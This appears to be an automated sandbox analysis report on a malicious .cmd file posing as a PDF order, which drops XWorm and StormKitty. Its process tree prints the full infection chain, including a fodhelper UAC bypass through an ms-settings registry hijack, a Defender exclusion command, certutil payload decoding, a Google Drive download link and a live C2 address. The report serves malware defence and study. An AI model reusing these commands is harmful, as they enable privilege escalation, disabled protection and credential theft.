Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/01/2025, 09:41 UTC

General

  • Target

    Adline-Order_New Material_Specification_Order_no_MGP8K804 ,pdf.cmd

  • Size

    2.6MB

  • MD5

    e9310ff7859997821cabdb77fa1fc48a

  • SHA1

    14162fb813665c6e33e4e96278f05489f89b7025

  • SHA256

    a5fd7ac848ce34637de12d1925e2ebcad0f5ab7e833b66933e4bcf6791d0ceb6

  • SHA512

    e40686cb59439ca252eefd5363701b37555a9ed59812c7af7833fb566e74cd260f30c7e14d9a41ca632e1642480d473827701937af8c00d9754cd6d3565cb6c9

  • SSDEEP

    24576:W1sg0bAvBbbTatN015Xp34cZY1cPXCn+RCN1DVkOUH01Si8nZhh2R1hIw/pZEGXE:W1svbAvBb7535k001SiMqpXXXcp

Malware Config

Extracted

Family

xworm

Version

5.0

C2

79.110.49.39:5319

Mutex

7meUpyW3fQgeRauF

Attributes
  • install_file

    USB.exe

aes.plain
1
N3pGHxYHJ09IEcHzbgMjQg==

Signatures

  • Detect Xworm Payload 2 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 32 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Kills process with taskkill 2 IoCs
  • Modifies registry class 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Adline-Order_New Material_Specification_Order_no_MGP8K804 ,pdf.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1032
    • C:\Windows\System32\esentutl.exe
      C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.exe /o
      2⤵
        PID:1704
      • C:\Windows\System32\esentutl.exe
        C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\extrac32.exe /d C:\\Users\\Public\\CApha.exe /o
        2⤵
          PID:3044
        • C:\Windows\System32\esentutl.exe
          C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\certutil.exe /d C:\\Users\\Public\\phf.exe /o
          2⤵
            PID:1200
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
            2⤵
            • Executes dropped EXE
            PID:4344
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
            2⤵
            • Executes dropped EXE
            PID:4532
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\CApha /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3952
            • C:\Users\Public\CApha.exe
              C:\\Users\\Public\\CApha /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              3⤵
              • Executes dropped EXE
              PID:916
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\CApha /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2948
            • C:\Users\Public\CApha.exe
              C:\\Users\\Public\\CApha /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              3⤵
              • Executes dropped EXE
              PID:4340
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\CApha /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4212
            • C:\Users\Public\CApha.exe
              C:\\Users\\Public\\CApha /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              3⤵
              • Executes dropped EXE
              PID:4368
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionExtension .pif"' ; "
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1604
            • C:\Users\Public\xkn.exe
              C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionExtension .pif"' ; "
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4804
              • C:\Users\Public\alpha.exe
                "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionExtension .pif"
                4⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:4120
                • C:\Users\Public\ger.exe
                  C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionExtension .pif"
                  5⤵
                  • Executes dropped EXE
                  • Modifies registry class
                  PID:4612
          • C:\Windows \System32\per.exe
            "C:\\Windows \\System32\\per.exe
            2⤵
            • Checks computer location settings
            • Executes dropped EXE
            PID:712
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\phf -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Adline-Order_New Material_Specification_Order_no_MGP8K804 ,pdf.cmd" "C:\\Users\\Public\\AnyDesk.avi" 9
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3820
            • C:\Users\Public\phf.exe
              C:\\Users\\Public\\phf -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Adline-Order_New Material_Specification_Order_no_MGP8K804 ,pdf.cmd" "C:\\Users\\Public\\AnyDesk.avi" 9
              3⤵
              • Executes dropped EXE
              PID:3404
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\phf -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 12
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1224
            • C:\Users\Public\phf.exe
              C:\\Users\\Public\\phf -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 12
              3⤵
              • Executes dropped EXE
              PID:4296
          • C:\Users\Public\Libraries\AnyDesk.pif
            C:\Users\Public\Libraries\AnyDesk.pif
            2⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:2124
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
              3⤵
              • System Location Discovery: System Language Discovery
              PID:756
            • C:\Users\Public\Libraries\doxdtthV.pif
              C:\Users\Public\Libraries\doxdtthV.pif
              3⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:4908
              • C:\Users\Admin\AppData\Local\Temp\mddrdk.exe
                "C:\Users\Admin\AppData\Local\Temp\mddrdk.exe"
                4⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:116
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 2068
                4⤵
                • Program crash
                PID:3120
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4364
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM SystemSettings.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4352
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2348
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM SystemSettingsAdminFlows.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2312
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 5
            2⤵
            • Executes dropped EXE
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:1152
            • C:\Windows\system32\PING.EXE
              ping 127.0.0.1 -n 5
              3⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:8
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
            2⤵
            • Executes dropped EXE
            PID:4568
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
            2⤵
            • Executes dropped EXE
            PID:3252
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
            2⤵
            • Executes dropped EXE
            PID:4552
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\per.exe" / A / F / Q / S
            2⤵
            • Executes dropped EXE
            PID:524
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
            2⤵
            • Executes dropped EXE
            PID:808
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CApha.exe" / A / F / Q / S
            2⤵
            • Executes dropped EXE
            PID:4576
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
            2⤵
            • Executes dropped EXE
            PID:1196
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\phf.exe" / A / F / Q / S
            2⤵
            • Executes dropped EXE
            PID:3936
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.avi" / A / F / Q / S
            2⤵
            • Executes dropped EXE
            PID:3248
        • C:\Windows\system32\SystemSettingsAdminFlows.exe
          "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
          1⤵
            PID:3588
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4908 -ip 4908
            1⤵
              PID:4956

            Network

            • flag-us
              DNS
              149.220.183.52.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              149.220.183.52.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              8.153.16.2.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              8.153.16.2.in-addr.arpa
              IN PTR
              Response
              8.153.16.2.in-addr.arpa
              IN PTR
              a2-16-153-8deploystaticakamaitechnologiescom
            • flag-us
              DNS
              cxcs.microsoft.net
              Remote address:
              8.8.8.8:53
              Request
              cxcs.microsoft.net
              IN A
              Response
              cxcs.microsoft.net
              IN CNAME
              cxcs.microsoft.net.edgekey.net
              cxcs.microsoft.net.edgekey.net
              IN CNAME
              e3230.b.akamaiedge.net
              e3230.b.akamaiedge.net
              IN A
              23.62.195.195
            • flag-gb
              GET
              https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop
              Remote address:
              23.62.195.195:443
              Request
              GET /api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop HTTP/2.0
              host: cxcs.microsoft.net
              accept-encoding: gzip, deflate
              Response
              HTTP/2.0 404
              content-type: text/html
              content-length: 26
              date: Tue, 07 Jan 2025 09:41:56 GMT
            • flag-us
              DNS
              95.221.229.192.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              95.221.229.192.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              195.195.62.23.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              195.195.62.23.in-addr.arpa
              IN PTR
              Response
              195.195.62.23.in-addr.arpa
              IN PTR
              a23-62-195-195deploystaticakamaitechnologiescom
            • flag-us
              DNS
              13.86.106.20.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              13.86.106.20.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              drive.google.com
              AnyDesk.pif
              Remote address:
              8.8.8.8:53
              Request
              drive.google.com
              IN A
              Response
              drive.google.com
              IN A
              172.217.169.78
            • flag-us
              DNS
              78.169.217.172.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              78.169.217.172.in-addr.arpa
              IN PTR
              Response
              78.169.217.172.in-addr.arpa
              IN PTR
              lhr48s09-in-f141e100net
            • flag-gb
              GET
              https://drive.google.com/uc?export=download&id=1C3j-ToJIRt_1_Xv0EuOXUQjhg5NZPPqf
              AnyDesk.pif
              Remote address:
              172.217.169.78:443
              Request
              GET /uc?export=download&id=1C3j-ToJIRt_1_Xv0EuOXUQjhg5NZPPqf HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: drive.google.com
              Response
              HTTP/1.1 303 See Other
              Content-Type: application/binary
              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
              Pragma: no-cache
              Expires: Mon, 01 Jan 1990 00:00:00 GMT
              Date: Tue, 07 Jan 2025 09:42:10 GMT
              Location: https://drive.usercontent.google.com/download?id=1C3j-ToJIRt_1_Xv0EuOXUQjhg5NZPPqf&export=download
              Strict-Transport-Security: max-age=31536000
              Content-Security-Policy: script-src 'report-sample' 'nonce-D622xjVnLwPn_SdQ_99yvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
              Cross-Origin-Opener-Policy: same-origin
              Server: ESF
              Content-Length: 0
              X-XSS-Protection: 0
              X-Frame-Options: SAMEORIGIN
              X-Content-Type-Options: nosniff
              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            • flag-us
              DNS
              drive.usercontent.google.com
              AnyDesk.pif
              Remote address:
              8.8.8.8:53
              Request
              drive.usercontent.google.com
              IN A
              Response
              drive.usercontent.google.com
              IN A
              216.58.212.193
            • flag-gb
              GET
              https://drive.usercontent.google.com/download?id=1C3j-ToJIRt_1_Xv0EuOXUQjhg5NZPPqf&export=download
              AnyDesk.pif
              Remote address:
              216.58.212.193:443
              Request
              GET /download?id=1C3j-ToJIRt_1_Xv0EuOXUQjhg5NZPPqf&export=download HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: drive.usercontent.google.com
              Response
              HTTP/1.1 200 OK
              X-GUploader-UploadID: AFiumC72KEi6xWvy0CA3q7vlplWfDFFqBEm_u885w-u8g9QIW2hTdGzStaf6iK3Ay9thpc4oFB_Xe8o
              Content-Type: application/octet-stream
              Content-Security-Policy: sandbox
              Content-Security-Policy: default-src 'none'
              Content-Security-Policy: frame-ancestors 'none'
              X-Content-Security-Policy: sandbox
              Cross-Origin-Opener-Policy: same-origin
              Cross-Origin-Embedder-Policy: require-corp
              Cross-Origin-Resource-Policy: same-site
              X-Content-Type-Options: nosniff
              Content-Disposition: attachment; filename="245_Vhttdxodydc"
              Access-Control-Allow-Origin: *
              Access-Control-Allow-Credentials: false
              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Places-Ios-Sdk, X-Android-Package, X-Android-Cert, X-Places-Android-Sdk, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-Bot-Info, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context, X-AppInt-Credentials
              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
              Accept-Ranges: bytes
              Content-Length: 667808
              Last-Modified: Tue, 07 Jan 2025 06:36:44 GMT
              Date: Tue, 07 Jan 2025 09:42:16 GMT
              Expires: Tue, 07 Jan 2025 09:42:16 GMT
              Cache-Control: private, max-age=0
              X-Goog-Hash: crc32c=mVgHnQ==
              Server: UploadServer
              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            • flag-us
              DNS
              193.212.58.216.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              193.212.58.216.in-addr.arpa
              IN PTR
              Response
              193.212.58.216.in-addr.arpa
              IN PTR
              lhr25s27-in-f11e100net
              193.212.58.216.in-addr.arpa
              IN PTR
              ams16s21-in-f1�H
              193.212.58.216.in-addr.arpa
              IN PTR
              ams16s21-in-f193�H
            • flag-us
              DNS
              212.20.149.52.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              212.20.149.52.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              206.23.85.13.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              206.23.85.13.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              172.214.232.199.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              172.214.232.199.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              39.49.110.79.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              39.49.110.79.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              22.236.111.52.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              22.236.111.52.in-addr.arpa
              IN PTR
              Response
            • 23.62.195.195:443
              https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop
              tls, http2
              1.4kB
              7.1kB
              19
              16

              HTTP Request

              GET https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop

              HTTP Response

              404
            • 172.217.169.78:443
              drive.google.com
              AnyDesk.pif
              190 B
              92 B
              4
              2
            • 172.217.169.78:443
              https://drive.google.com/uc?export=download&id=1C3j-ToJIRt_1_Xv0EuOXUQjhg5NZPPqf
              tls, http
              AnyDesk.pif
              912 B
              8.5kB
              9
              10

              HTTP Request

              GET https://drive.google.com/uc?export=download&id=1C3j-ToJIRt_1_Xv0EuOXUQjhg5NZPPqf

              HTTP Response

              303
            • 216.58.212.193:443
              https://drive.usercontent.google.com/download?id=1C3j-ToJIRt_1_Xv0EuOXUQjhg5NZPPqf&export=download
              tls, http
              AnyDesk.pif
              12.6kB
              712.7kB
              262
              516

              HTTP Request

              GET https://drive.usercontent.google.com/download?id=1C3j-ToJIRt_1_Xv0EuOXUQjhg5NZPPqf&export=download

              HTTP Response

              200
            • 79.110.49.39:5319
              doxdtthV.pif
              16.7kB
              937.7kB
              354
              675
            • 79.110.49.39:5319
              doxdtthV.pif
              144 B
              52 B
              3
              1
            • 8.8.8.8:53
              149.220.183.52.in-addr.arpa
              dns
              73 B
              147 B
              1
              1

              DNS Request

              149.220.183.52.in-addr.arpa

            • 8.8.8.8:53
              8.153.16.2.in-addr.arpa
              dns
              69 B
              131 B
              1
              1

              DNS Request

              8.153.16.2.in-addr.arpa

            • 8.8.8.8:53
              cxcs.microsoft.net
              dns
              64 B
              154 B
              1
              1

              DNS Request

              cxcs.microsoft.net

              DNS Response

              23.62.195.195

            • 8.8.8.8:53
              95.221.229.192.in-addr.arpa
              dns
              73 B
              144 B
              1
              1

              DNS Request

              95.221.229.192.in-addr.arpa

            • 8.8.8.8:53
              195.195.62.23.in-addr.arpa
              dns
              72 B
              137 B
              1
              1

              DNS Request

              195.195.62.23.in-addr.arpa

            • 8.8.8.8:53
              13.86.106.20.in-addr.arpa
              dns
              71 B
              157 B
              1
              1

              DNS Request

              13.86.106.20.in-addr.arpa

            • 8.8.8.8:53
              drive.google.com
              dns
              AnyDesk.pif
              62 B
              78 B
              1
              1

              DNS Request

              drive.google.com

              DNS Response

              172.217.169.78

            • 8.8.8.8:53
              78.169.217.172.in-addr.arpa
              dns
              73 B
              112 B
              1
              1

              DNS Request

              78.169.217.172.in-addr.arpa

            • 8.8.8.8:53
              drive.usercontent.google.com
              dns
              AnyDesk.pif
              74 B
              90 B
              1
              1

              DNS Request

              drive.usercontent.google.com

              DNS Response

              216.58.212.193

            • 8.8.8.8:53
              193.212.58.216.in-addr.arpa
              dns
              73 B
              171 B
              1
              1

              DNS Request

              193.212.58.216.in-addr.arpa

            • 8.8.8.8:53
              212.20.149.52.in-addr.arpa
              dns
              72 B
              146 B
              1
              1

              DNS Request

              212.20.149.52.in-addr.arpa

            • 8.8.8.8:53
              206.23.85.13.in-addr.arpa
              dns
              71 B
              145 B
              1
              1

              DNS Request

              206.23.85.13.in-addr.arpa

            • 8.8.8.8:53
              172.214.232.199.in-addr.arpa
              dns
              74 B
              128 B
              1
              1

              DNS Request

              172.214.232.199.in-addr.arpa

            • 8.8.8.8:53
              39.49.110.79.in-addr.arpa
              dns
              71 B
              131 B
              1
              1

              DNS Request

              39.49.110.79.in-addr.arpa

            • 8.8.8.8:53
              22.236.111.52.in-addr.arpa
              dns
              72 B
              158 B
              1
              1

              DNS Request

              22.236.111.52.in-addr.arpa

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xxeqtasq.xh0.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\mddrdk.exe

              Filesize

              282KB

              MD5

              d507d45d3f4d0b9e2be7613f31ad4e06

              SHA1

              77b0e9b2d4bc9b64713e412915b3746d52d689e7

              SHA256

              51405a433b7aee631ceb5151dbd6ebed756321dbc8797472765333603b7664a9

              SHA512

              e1b6ac08973c9bc3fdde6368657b34930948ffc32d91ef7b1474257fb0240d71bdedddf7c418c3c687a920650236c1f056962c5a568bd1a6e360308dd87ecda0

            • C:\Users\Public\AnyDesk.avi

              Filesize

              1.9MB

              MD5

              4c5df8cd0e2a293bf438d1288b28ade2

              SHA1

              0e92ea51b7b1932dead2301e518574beccf4f6c2

              SHA256

              46f40dc1d81da0ab9b892b6d7ae93b543f2d22e872aa72a09cf70aea1f8ff1b2

              SHA512

              ab0bfcf7c98530266b08862c46530b03645937224c947a8f17a801b7c4f4d2db885722aed536f11365a7f4df2c99df04108208fa9fd2ff84cec535488d4e49fa

            • C:\Users\Public\CApha.exe

              Filesize

              34KB

              MD5

              41330d97bf17d07cd4308264f3032547

              SHA1

              0fcd5a3233316939129e6fcf4323e925e8406e5d

              SHA256

              a224559fd6621066347a5ba8f4aeeceea8a0a7a881a71bd36de69aceb52e9df7

              SHA512

